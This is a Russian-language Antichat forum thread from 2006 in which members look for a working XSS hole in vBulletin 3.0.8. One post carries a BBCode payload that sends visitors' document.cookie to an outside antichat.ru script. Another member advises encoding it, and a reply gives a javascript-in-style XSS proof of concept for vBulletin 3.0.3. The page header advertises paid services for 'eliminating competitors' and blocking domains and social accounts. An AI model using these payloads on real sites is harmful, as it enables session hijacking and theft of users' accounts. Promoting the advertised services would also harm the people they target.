Форум АНТИЧАТ - Есть ли XSS в vBulletin 3.0.8 ?

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Есть ли XSS в vBulletin 3.0.8 ?

Страница 1 из 3

Опции темы

Поиск в этой теме

Опции просмотра

Есть ли XSS в vBulletin 3.0.8 ?

05.01.2006, 01:35

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

Есть ли XSS в vBulletin 3.0.8 ?

Если какие-нибуль Xss? Пробывал для предыдущих версий (описанных на форуме) ничего не работает. Жду вашим комментариев и советов.

05.01.2006, 02:18

•••™NO FEAR™•••

Постоянный

Регистрация: 08.08.2005

Сообщений: 782

Провел на форуме:
6573706

Репутация: 1419

Цитата:

Прочитай статью WJ, может она тебе поможет ))))))))))))))))))))
http://forum.antichat.ru/thread11807.html

05.01.2006, 03:02

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

2 Him@s, неа

Просто выводит вот такой текст:

[FONT=Arial size=20 style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); / ]wj" target="_blank">http://www.]wj

А http://www.] стает линком на http://www.]/ и все

05.01.2006, 03:04

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

Может в твоем HTML коде нужно что-то заменить или убрать?

05.01.2006, 03:33

_-[A.M.D]HiM@S-_

Green member

Регистрация: 28.12.2005

Сообщений: 376

Провел на форуме:
5559831

Репутация: 1833

так правильно...тока для начала ты его закодируй:
http://www.h4cky0u.org/encrypt/index.php

05.01.2006, 03:36

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

Все или часть? И какую кодировку выбирать? Можешь уже сюда кинуть закодированный код?

05.01.2006, 03:54

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

ты его проверял?

У меня вот что в сообщение пишет:

wj" target="_blank">http://www.][FONT=Arial style=d...41; / ]wj

http://www.] - является ссылкой на http://www.]/

(((((

ЗЫ.. + перед документ.кукис не убрал.. знаю что там он нуже.. и пишет то что я выше написал.

05.01.2006, 04:09

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

у меня на локалхосте, я там пробую... могу дать ссылку на дистрибутив

http://vbulletin.net.ru
Вот здесь скачай 3.0.8

Последний раз редактировалось Azazel; 05.01.2006 в 04:31..

05.01.2006, 23:33

FoGorm

Познающий

Регистрация: 04.01.2006

Сообщений: 55

Провел на форуме:
106810

Репутация: 10

что никто так помочь и не сможет?

#10

06.01.2006, 00:15

Algol

Регистрация: 29.05.2002

Сообщений: 1,793

Провел на форуме:
2050916

Репутация: 0

vBulletin 3.0.3:

Код HTML:

[ EMAIL=[ URL= as=`s@wew.ew]mailto:assss@wew.ew ]
sssssssssssssssssssssssssss[/URL][/EMAIL]` style=`background:url(javaSCrip t:alert(/Hi_from_Algol/))`

(без пробела после квадратной скобки)

Последний раз редактировалось Algol; 06.01.2006 в 00:21..

Страница 1 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
секреты и коды для сотовых телефонов )))	dinar_007	Сотовый фрикинг	32	05.08.2006 17:06
Есть ли уязвимости в Vbulletin 3.5.1?	Fu4er	Форумы	3	10.12.2005 20:00
ЕсТь ВоПрос	Guma	Чаты	4	26.10.2005 21:48

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход